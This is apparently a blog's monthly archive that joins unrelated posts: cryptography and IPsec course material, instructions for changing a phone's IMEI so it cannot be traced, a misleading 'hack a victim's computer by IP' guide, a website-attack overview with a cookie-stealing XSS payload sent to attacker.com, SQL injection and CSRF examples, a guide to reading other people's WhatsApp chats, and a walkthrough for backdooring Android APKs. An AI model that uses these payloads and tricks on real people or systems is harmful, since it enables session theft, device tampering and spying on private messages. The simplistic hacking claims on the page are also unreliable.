Monthly Archives: July 2016

MODULE 3.1 Applications of Cryptography

Cryptography can be applied in communication of data and information, which you will see in the form of IPsec, SSL, and PGP. In this section we will examine these protocol suites and see how cryptography fits in.

 

IPsec

Internet Protocol Security (IPsec) is a set of protocols designed to protect the confidentiality and integrity of data as it flows over a network. The set of protocols is designed to operate at the Network layer of the OSI model and process packets according to a predefined group of settings.

Some of the earliest mechanisms for ensuring security worked at the Application layer of the OSI model. IPsec is a new technology that has proven to be more successful than many of the previous methods.

IPsec has been widely adopted not only because of its tremendous security benefits but also because of its ability to be implemented without major changes to individual computer systems.

IPsec is especially useful for implementing virtual private networks and for remote user access through dial-up connection to private networks.

IPsec provides two mechanisms for protecting information: Authentication Header and Encapsulating Security Payload. The two modes differ in what they provide:

  • Authentication Header (AH) provides authentication services and provides a way to authenticate the sender of data.
  • Encapsulating Security Payload (ESP) provides a means to authenticate information as well as encrypt the data.

 

 

Working with IPsec In this exercise you will learn how to create a simple IPsec policy in the Windows operating system.

The following steps show you how to create an IPsec Negotiation policy on a Windows computer:

1. On Computer A, click Start ➢ All Programs ➢ Administrative Tools, and then select Local Security Policy.

2. Right-click IP Security Policies on the Local Computer node, and then choose
Create IP Security Policy.

3. On the Welcome screen of the IP Security Policy Wizard, click Next.

4. In the Name field, type Secure21. In the Description field, type Policy to encrypt FTP, and then click Next.

5. On the Default Response Rule Authentication Method screen, choose the option Use This String To Protect The Key Exchange (Preshared Key) and type password.

6. On the Completing The IP Security Policy Wizard screen, ensure that Edit Properties is selected, and then click Finish.

7. In the Secure21 Properties dialog box, click Add.

8. On the Welcome To The Create IP Security Rule Wizard screen, click Next.

9. On the Tunnel EndPoint screen, click This Rule Does Not Specify A Tunnel. Click Next.

10. On the Network Type screen, click All Network Connections, and then click Next.

11. On the IP Filter List screen, click Add.

12. In the IP Filter List dialog box that appears, type Link1986, and then click Add.

13. On the Welcome screen of the IP Filter Wizard, click Next.

14. In the Description field, type 21 IPsec Filter. Click Next.

15. On the IP Traffic Source screen, click Any IP Address, and then click Next.

16. On the IP Traffic Destination screen, click Any IP Address, and then click Next.

17. On the IP Protocol Type screen, click TCP in the drop-down list, and then click Next.

18. On the Protocol Port screen, select From This Port, type 21 in the text box, select To Any Port, and then click Next.

19. On the Completing The IP Filter Wizard screen, click Finish, and then click OK.

20. In the IP Filter list, select Link1986, and then click Next

. 21. In the Filter Action dialog box, click Add

. 22. In the Filter Action Wizard dialog box, click Next.

23. In the Filter Action Name dialog box, type Secure21Filter, and then click Next.

24. In the Filter Action General Options dialog box, select Negotiate Security, and then click Next.

25. On the Communicating With Computers That Do Not Support IPsec screen, select Do Not Allow Unsecured Communications, and then click Next.

26. On the IP Traffic Security screen, select Integrity and Encryption, and then click
Next.

27. On the Completing The IP Security Filter Action Wizard screen, click Finish.

28. In the Filter Action dialog box, select Secure21Filter, and then click Next.

29. In the Authentication Method dialog box, select Use This String To Protect The Key Exchange (Preshared Key), type password, and then click Next.

30. On the Completing The Security Rule Wizard screen, click Finish.

31. In the Secure21 Properties dialog box, click OK. Once you’ve created the policy, you must activate it, so let’s do that.

 

On Computer A:

1. Click Start ➢ All Programs ➢ Administrative Tools ➢ Local Security Policy.

2. Select the Local Computer node ➢ IP Security Policies, and in the right pane right-click the Secure21 policy and click Assign.

On Computer B:

1. In the Local Security Policy Microsoft Management Console (MMC), on the Local Computer node right-click IP Security Policies, select All Tasks, and then click Export Policies.

2. In the Save As dialog box, type C:\IPsecPolicy\IPsecurityPolicy21.ipsec, and then click Save. You must then save the IPsec policy.

Import the security policy to a Windows machine.

Next, configure a Security Association rule in the Windows Firewall with Advanced Security MMC:

1. On Computer A, click Start ➢ Administrative Tools ➢ Windows Firewall With Advanced Security.

2. Select and then right-click Connection Security Rules, and then click New Rule.

3. In the New Connection Security Rule Wizard, select Server-To-Server, and then click Next.

4. On the Endpoints screen, select Any IP Address for both options, and then click Next.

5. On the Requirements screen, select Require Authentication For Inbound And Outbound Connections, and then click Next.

6. On the Authentication Method screen, select Preshared Key, type password in the text box, and then click Next.

7. On the Profile screen, verify that the Domain, Private, and Public options are selected, and then click Next.
8. In the Name text box, type Secure Server Authentication Rule, and then click Finish.

9. Perform steps 1–8 on Computer B.

MODULE 3.0 Cryptography

Cryptography is the body of knowledge that relates to the protection of information in all its forms.

Through the application of cryptography, you can safeguard the confidentiality and maintain the integrity as well as the nonrepudiation and authentication of information.

Cryptography provides you with a means of keeping information away from prying eyes and gives you a way to keep the same information intact from alteration.

This chapter focuses on cryptography and its application in the modern world, but first itdelves into some of the rich history of the science to give you a firm foundation on which you can build your knowledge.

The science of cryptography provides a unique set of abilities that have been around as long as humans have wanted to share information with some but not with others.

Although technology, science, and computers have improved on the older methods, what has remained a constant is the underlying goal of protecting information

 

Cryptography in Action

You will encounter cryptography in many forms throughout this book.

It is applied to many different technologies and situations and, as such, is something you need to have a firm grasp of.

Here are some examples of applied cryptography:

Public key infrastructure (PKI)

Digital certificates Authentication

E-commerce

RSA

MD-5

Secure Hash Algorithm (SHA)

Secure Sockets Layer (SSL)

Pretty Good Privacy (PGP)

Secure Shell (SSH)

So How Does It Work?

Cryptography has many different ways of functioning. Before you can understand the basic process, you must become familiar with some terminology. With this in mind, let’s look at a few of the main terms used in the field of cryptography:
Plain Text/Clear Text Plain text is the original message. It has not been altered; it is the usable information. Remember that even though Caesar’s cipher operates on text, it is but one form of plain text. Plain text can literally be anything.

Cipher Text Cipher text is the opposite of plain text; it is a message or other data that has been transformed into a different format using a mechanism known as an algorithm. It is also something that can be reversed using an algorithm and a key.

Algorithms Ciphers, the algorithms for transforming clear text into cipher text, are the trickiest and most mysterious part of the encryption process. This component sounds complex, but the algorithm or cipher is nothing more than a formula that includes discrete steps that describe how the encryption and decryption process is to be performed in a given instance.

Keys Keys are an important, and frequently complicated, item. A key is a discrete piece of information, usually random in nature, that determines the result or output of a given cryptographic operation. A key in the cryptographic sense can be thought of in the same way a key in the physical world is: as a special item used to open or unlock something—in this case, a piece of information. In the encryption world, a key is used to produce a meaningful result and without it a result would not be possible.

 

Symmetric Cryptography

Symmetric algorithms do some things really well and other things not so well. Modern symmetric algorithms are great at all of the following:

  • Preserving confidentiality
  • Increased speed over many non-symmetric systems
  • Ensuring simplicity (relatively speaking, of course)
  • Providing authenticity

Symmetric algorithms have drawbacks in these areas:

  • Key management issues
  • Lack of nonrepudiation features

Common Symmetric Algorithms

There are currently a myriad of symmetric algorithms available to you; a Google search turns up an endless sea of alphabet soup of algorithms.

Let’s look at some common algorithms in the symmetric category:

Data Encryption Standard (DES) Originally adopted by the U.S. Government in 1977, the DES algorithm is still in use today. DES is a 56-bit key algorithm, but the key is too short to be used today for any serious security applications. DES is still encountered in many applications but should never be chosen without very careful consideration or the lack of other viable options.

Triple DES (3DES) This algorithm is an extension of the DES algorithm and is three times more powerful than the DES algorithm. The algorithm uses a 168-bit key. Triple DES, or 3DES, is very commonly used and is a component of many security solutions including e-commerce and others.

Blowfish Blowfish is an algorithm that was designed to be strong, fast, and simple in its design. The algorithm uses a 448-bit key and is optimized for use in today’s 32- and 64-bit processors (which its predecessor DES was not). The algorithm was designed by encryption expert Bruce Schneier.

International Data Encryption Algorithm (IDEA) Designed in Switzerland and made available in 1990, this algorithm is seen in applications such as the Pretty Good Privacy (PGP) system

RC2 Originally an algorithm that was a trade secret of RSA Labs, the RC2 algorithm crept into the public space in 1996. The algorithm allows keys between 1 and 2,048 bits. The RC2 key length was traditionally limited to 40 bits in software that was exported to allow for decryption by the U.S. National Security Agency.

RC4 Another algorithm that was originally a trade secret of RSA Labs, RC4, was revealed to the public via a newsgroup posting in 1994. The algorithm allows keys between 1 and 2,048 bits. RC4 is notable for its inclusion in the Wired Equivalent Protection (WEP) protocol used in early wireless networks.

RC5 Similar to RC2 and RC4, RC5 allows users to define a key length.

RC6 RC6 is another AES finalist developed by RSA Labs and supports key lengths of 128– 256 bits.

Rijndael or Advanced Encryption Standard (AES) This successor to DES was chosen by the National Institute of Standards and Technology (NIST) to be the new U.S. encryption standard. The algorithm is very compact and fast and can use keys that are 128-, 192-, or 256-bits long. Rijndael was and is the name of the encryption algorithm submitted for consideration by the U.S. Government as its new encryption standard. When the algorithm was selected, it was renamed AES. While some may argue that Rijndael and AES are different, they are for all intents and purposes the same.

Twofish This AES candidate, also developed by Bruce Schneier, supports key lengths of 128–256 bits.

 

How To Change IMEI, Device ID of Any Android Device

Changing the IMEI (International Mobile Equipment Identity) and device id of any android device is really not a good idea because there are many advantage or disadvantage but sometime it help us to take some extra benefit from our device. Where the IMEI is used to trace the location of a device or find the stolen device, on the other hand its used to make a device untraceable by changing its IMEI number, serial number, device id, Donkeyguard number, UDID.

You can also convert/change your Android IMEI to Blackberry (BB) IMEI by which you can use GLO BIS on it.

Reason to change/convert your device’s IMEI number,

1. Make you device untraceable and unreachable,
2. Convert Android IMEI to Blackberry IMEI to use GLO BIS plan,
3. Fix invalid IMEI  number problem on any devices,
4. Reset/Update/Repair your Device,
5. Getting an Unique device ID.

Universal method or the full procedure to change/rewrite IMEI number of an Android device(includes tablet) with or without root your device or with or without the use of any IMEI Changer Software, IMEI Change Tool, Terminal Emulator programmatically .

Find IMEI number or Device Id of any android device (either phone or tablet):

If you are unable to find out the device id or IMEI number of your device then a simple below trick will help you,
  • To find out IMEI number of your device, just dial *#06# .
  • To find out device ID, Just dial *#*#8255#*#* and you will get your device id in GTalk Service Monitor. And an another way to find out device id is by going to Menu > Settings > About Phone > Status.

How to change IMEI number/

1. First Dial *#7465625# or *#*#3646633#*#* on your android device.

2. Now, click on Connectivity option or call pad,

3. Now look for CDS information and then click on it.

4. Then, checkout for Radio information.

5. Now, if your android device is a dual sim device. Then you will get two option like IMEI_1  [SIM1] and IMEI_2 [SIM2]. Then select any one or of which you want to change IMEI number.

6. Now, change your IMEI number illustrated below,

AT +EGMR=1,7,”IMEI_1” and “AT +EGMR=1,10,”IMEI_2

7. Now, just replace IMEI1 or IMEI2 with your any your desired number. and then click on SEND.

Note: You can also change IMEI number to any Blackberry [BB] IMEI number.

How to Change Device ID of your Android phone or tablet/ :

Device ID of an Android device can be changed with our without root,

Change Device ID with Root,

1. First Root Your Android device.

2. Now, Download and install Device ID changer,

3. Now, follow the wizard of this app.

4. And after changing the device id, restart/reboot your device and done.

Change Device ID without Root,

 

1. First, Backup your Android device. click here

2. Go to Settings. and then click on Backup & Reset.

3. Then, click on ‘Factory Data Reset‘.

4. And, then reset you phone.

5. When, reset done. Then you will get a new and unique device ID.

Now:- This will wipe your all data like messages, phone memory, contacts, apps. So, you must have to backup your device and after that you can restore it.

Hack a Computer Only with just a IP Address in Easy steps

Steps to Hack IP Address:


1) Prepare the IP address of the Victim. (e.g : 101.23.53.70 )

2) Download and Install Advanced Port Scanner.

3) Open Advanced Port Scanner and Type the IP Address in the right column and Click Scan.

hack pc, hack with ip
4) It will lists you all Opened Ports of the Victim’s PC or Router. (e.g : Port 91 )
5) After retrieving the IP address and the Opened Ports of the Victim, Open Command Prompt (CMD)
and Type: telnet [IP ADDRESS] [PORT]
 
e.g : telnet 101.23.53.70  91
 

6) Now you’ll be asked to Enter Login Information, Just type Username and Password and hit Enter.
If no password is used just type the Username.

Done! Now you’ll get access to all Victim’s Files and Documents by browsing with CMD (use cd, copy, delete, mv… to do all tricks.)

10 Most Popular Ways Hackers Hack Your Website

Hackers can attack in so many ways, but here’s the ten most popular ways they can threaten the security of your site, and your business:

10.  Injection Attacks

Injection Attacking occurs when there are flaws in your SQL Database, SQL libraries, or even the operating system itself. Employees open seemingly credible files with hidden commands, or “injections”, unknowingly.

In doing so, they’ve allowed hackers to gain unauthorized access to private data such as social security numbers, credit card number or other financial data.

Technical Injection Attack Example:

An Injection Attack could have this command line:

String query = “SELECT * FROM accounts WHERE custID=’” + request.getParameter(“id”) +”‘”;

The hacker modifies the ‘id’ parameter in their browser to send: ‘ or ‘1’=’1. This changes the meaning of the query to return all the records from the accounts database to the hacker, instead of only the intended customers.

9.  Cross Site Scripting Attacks

Cross Site Scripting, also known as an XSS attack, occurs when an application, url “get request”, or file packet is sent to the web browser window and bypassing the validation process. Once an XSS script is triggered, it’s deceptive property makes users believe that the compromised page of a specific website is legitimate.

For example, if www.example.com/abcd.html has XSS script in it, the user might see a popup window asking for their credit card info and other sensitive info.

Technical Cross Site Scripting Example:

A more technical example:

(String) page += “<input name=’creditcard’ type=’TEXT’ value=’” + request.getParameter(“CC”) + “‘>”;

The attacker modifies the ‘CC’ parameter in their browser to:

‘><script>document.location=’http://www.attacker.com/cgi-bin/cookie.cgi?foo=’+document.cookie</script>’

This causes the user’s session ID to be sent to the attacker’s website, allowing the hacker to hijack the user’s current session.  That means the hacker has access to the website admin credentials and can take complete control over it.  In other words, hack it.

8. Broken Authentication and Session Management Attacks

If the user authentication system of your website is weak, hackers can take full advantage.

Authentication systems involve passwords, key management, session IDs, and cookies that can allow a hacker to access your account from any computer (as long as they are valid).

If a hacker exploits the authentication and session management system, they can assume the user’s identity.

Scary indeed.

Ask yourself these questions to find out if your website is vulnerable to a broken authentication and session management attack:

  • Are user credentials weak (e.g. stored using hashing or encryption)?
  • Can credentials be guessed or overwritten through weak account management functions (e.g. account creation, change password, recover password, weak session IDs)?
  • Are session IDs exposed in the URL (e.g. URL rewriting)?
  • Are session IDs vulnerable to session fixation attacks?
  • Do session IDs timeout and can users log out?

If you answered “yes” to any of these questions, your site could be vulnerable to a hacker.

7. Clickjacking Attacks

Clickjacking, also called a UI Redress Attack, is when a hacker uses multiple opaque layers to trick a user into clicking the top layer without them knowing.

Thus the attacker is “hijacking” clicks that are not meant for the actual page, but for a page where the attacker wants you to be.

For example, using a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password for their bank account, but are actually typing into an invisible frame controlled by the attacker.

Clickjacking example:

Here’s a live, but safe example of how clickjacking works:

http://attacker.kotowicz.net/alphabet-hero/game.html

 

6. DNS Cache Poisoning

DNS Cache Poisoning involves old cache data that you might think you no longer have on your computer, but is actually “toxic”.

Also known as DNS Spoofing, hackers can identify vulnerabilities in a domain name system, which allows them to divert traffic from legit servers to a fake website and/or server.

This form of attack can spread and replicate itself from one DNS server to another DNS, “poisoning” everything in it’s path.

In fact, in 2010, a DNS poisoning attack completely compromised the Great Firewall of China (GFC) temporarily and censored certain content in the United States until the problem was fixed.

5. Social Engineering Attacks

A social engineering attack is not technically a “hack”.

It happens when you divulge private information in good faith, such as a credit card number, through common online interactions such as email, chat, social media sites, or virtually any website.

The problem, of course, is that you’re not getting into what you think you’re getting into.

A classic example of a social engineering attack is the “Microsoft tech support” scam.

This is when someone from a call center pretends to be a MS tech support member who says that your computer is slow and/or infected, and can be easily fixed – at a cost, of course.

Here’s an article from Wired.com on how a security expert played along with so-called Microsoft tech support person.

4. Symlinking – An Insider Attack

A symlink is basically a special file that “points to” a hard link on a mounted file system.  A symlinking attack occurs when a hacker positions the symlink in such a way that the user or application that access the endpoint thinks they’re accessing the right file when they’re really not.

If the endpoint file is an output, the consequence of the symlink attack is that it could be modified instead of the file at the intended location. Modifications to the endpoint file could include appending, overwriting, corrupting, or even changing permissions.

In different variations of a symlinking attack a hacker may be able to control the changes to a file, grant themselves advanced access, insert false information, expose sensitive information or corrupt or destroy vital system or application files.

3. Cross Site Request Forgery Attacks

A Cross Site Request Forgery Attack happens when a user is logged into a session (or account) and a hacker uses this opportunity to send them a forged HTTP request to collect their cookie information.

In most cases, the cookie remains valid as long as the user or the attacker stays logged into the account.  This is why websites ask you to log out of your account when you’re finished – it will expire the session immediately.

In other cases, once the user’s browser session is compromised, the hacker can generate requests to the application that will not be able to differentiate between a valid user and a hacker.

A Cross Site Attack Examples

Here’s an example:

http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243

<img src=”<span style=”color: red;”>http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#</span>” width=”0″ height=”0″ />

In this case the hacker creates a request that will transfer money from a user’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control.

2. Remote Code Execution Attacks

A Remote Code Execution attack is a result of either server side or client side security weaknesses.

Vulnerable components may include libraries, remote directories on a server that haven’t been monitored, frameworks, and other software modules that run on the basis of authenticated user access. Applications that use these components are always under attack through things like scripts, malware, and small command lines that extract information.

The following vulnerable components were downloaded 22 million times in 2011:

Apache CXF Authentication Bypass (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451)

By failing to provide an identity token, attackers could invoke any web service with full permission.

1. DDoS Attack – Distributed Denial Of Service Attack

DDoS, or Distributed Denial of Services, is where a server or a machine’s services are made unavailable to its users.

And when the system is offline, the hacker proceeds to either compromise the entire website or a specific function of a website to their own advantage.

It’s kind of like having your car stolen when you really need to get somewhere fast.

The usual agenda of a DDoS campaign is to temporarily interrupt or completely take down a successfully running system.

The most common example of a DDoS attack could be sending tons of URL requests to a website or a webpage in a very small amount of time.  This causes bottlenecking at the server side because the CPU just ran out of resources.

Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers.

How To Hack Whatsapp Conversation 2016

WhatsApp is one of the most widely used instant messaging applications during the recent years. Attractive features like cross-platform support and media sharing has made WhatsAppto be the top choice among most users. On the other hand, WhatsApp has also become a favorite application for many cheaters to exchange secret messages and maintain illicit relationships.

Everybody uses whatsapp messenger in android phone.  So here I tell how can you hackwhatsapp conversation and read whatsapp content of other users. Extract whatsapp is not so easy because whatsapp encrypt all backup data in .crypt format. The all whatsapp messages stores in encrypt format. So here I tell you every thing about extracting whatsapp data

Steps To Hack Whatsapp Conversation

1.First Backup of your Whatsapp Messages

  • Open WhatsApp from your App drawer
  • Press on the 3-dot menu icon on the top right
  • Tap on Settings, this will open the WhatsApp settings
  • Tap on Chat settings
  • Now, tap on Backup conversations to backup all the present messages
2.After backup download Next android app named Tri Crypt. This android app decryptwhatsapp crypt 5 format to readable .db(database) format.

How To Hack Whatsapp Conversation 2016
3.Open Tri Crypt Android app
4.Click on decrypt whatsapp messages.

How To Hack Whatsapp Conversation 2016
 
5.Now download Sqlite Editor android app for reading whatsapp .db file.

How To Hack Whatsapp Conversation 2016
6.Open Sqlite Editor android app go to Files. Here we have file and directories. We findmsgstore.db file in these directories.

How To Hack Whatsapp Conversation 2016
7.Now follow this path in Files ******find sd card folder <<whatsapp<<Databases and openmsgstore.db file.

How To Hack Whatsapp Conversation 2016
 
8.Now read all the whatsapp messages in Android Phone.

How To Hack Whatsapp Conversation 2016

How To Use WhatsApp Without Mobile Number 2015 and 2016

Hi Guyz Today i am going to share with you a latest whatsapp hacking trick-How to use whatsapp without using your mobile no. some people ask me about this they all thinks its not possible but today Pro Hackers gives you a trick to use this all hacks for free.
First of all, Save complete Whatsapp data to your phone.
  • You dont have any need to Remove it Completely.
  • Go to Setting and then go to whatsapp and Clear Data.After clearing the data your all whatsapp data is removed and now your whatsapp is completely new.
  • Now go to receivefreesms.com and select any of the no. Here I will use an Indian Mobile Number.
Fake%2BNumbers
FAKE NUMBERS
  • Enter the number in the required field on Whatsapp. It will take you to the sms verification page.

Now go back to receivefreesms.com and click on the number which you have chosen to verify Whatsapp sms verification.

Messages
Messages
  • Enter the verification code in WhatsApp verification page. That’s it, you are done..

Note:-  Some numbers might not work due to the technical error, no problem choose any other number to verify sms verification. The only drawback with this trick is anyone can use the same no. for verification so during those times WhatsApp will ask you to re-verify your number.

fping 3 – Multi Target ICMP Ping Tool

fping 3 – Multi Target ICMP Ping Tool
fping is a program like ping which uses the Internet Control Message Protocol (ICMP) echo request to determine if a target host is responding. fping differs from ping in that you can specify any number of targets on the command line, or specify a file containing the lists of targets to ping. Instead of sending […]

The post fping 3 –…

Read the full post at darknet.org.uk


New feed

Backdooring any APK using OpenSource PENETRATION TESTING tools

Smartphone Pentest Framework ships in with Kali Linux and is quiet well known for its utility in the penetration testing of the Android Devices . It has a huge range of attack tools included in itself for penetration testing of the Android devices . One of the features is to take a compiled APK file and add backdoor code to it . This tutorial is about how you can take custom compiled APK files and add the SPF backdoor to them .

The resulting app looks and feels like the original app, but with some extra functionality. This is just what a penetration tester would want .

Building SPF Agents: Backdooring Any APK

Backdooring any APK using open source Penetration testing tools

Lets say you are doing a Mobile Security Audit for an organisation . If you dont want to use the plain APK generated by the SPF then SPF allows you to take a pre compiled APK and Add custom backdoor code to it . This is also known as refactoring the APK in the penetration testing terms . This however will require you to use a third party apktool .

For  backdooring any APK choose option 1 from the main menu followed by 5.) Backdoor APK with Agent. You will be prompted for the APK to backdoor. If apktool is not found SPF will ask you if you want to download it before continuing.

spf> 1
Select An Option from the Menu:
1.) Attach Framework to a Deployed Agent
2.) Generate Agent App
3.) Copy Agent to Web Server
4.) Import an Agent Template
5.) Backdoor Android APK with Agent
6.) Create APK Signing Key
spf> 5
APKTool not found! Is it installed? Check your config file
Install Android APKTool(y/N)?
spf> y
..snip..
Puts the Android Agent inside an Android App APK. The application runs normally with extra functionality
APK to Backdoor: /root/Desktop/MapsDemo.apk
I: Baksmaling...

 

You will be prompted for the same information for control as backdooring source code.

Phone number of the control modem for the agent: 15555215554
Control key for the agent: KEYKEY1
Webserver control path for agent: /androidagent1
Control Number: 15555215554
Control Key:KEYKEY1
ControlPath:/androidagent1
Is this correct?(y/n) y
..snip..

 

The APK will be rebuilt with the SPF Agent included.

Clean and Simple as that . This is as quick as it can get  .

Are Android App Lockers really Secure ?

Android has been a common target for Exploit Community . This Post describes how a few simple steps can be taken to bypass the App Locker .

App Lockers are used by most of us to protect our Androids from unwanted or unauthorized access of our personal information. If you do a quick search of the phrase “app lock” in Google Play Store you will find lots of application provide facility to protect individual and multiple application. But with few steps anyone can bypass the same:

 Here is the steps :

Step 1.  Install any App locker from play store.

 Step 2.  Provide password to the similar App locker.

Now the application protected with app locker require password of app locker. Now perform the following steps to bypass the app locker password.

Step 3.  Now go to setting

Step 4.  Then Application

Step 5 :Select your App Locker.

Step 6.  Now click on Clear data button.

Step 7.  Now click on Force stop button.

Step 8. Finish

Now open any application which is protected with app locker without credential.

This technique has been sitting right under your nose for so long . This is not a vulnerability in Android or the App locker . This is just a trick to show you that you must not completely rely on App Lockers and set a strong Password for your Android Screen Lock as well.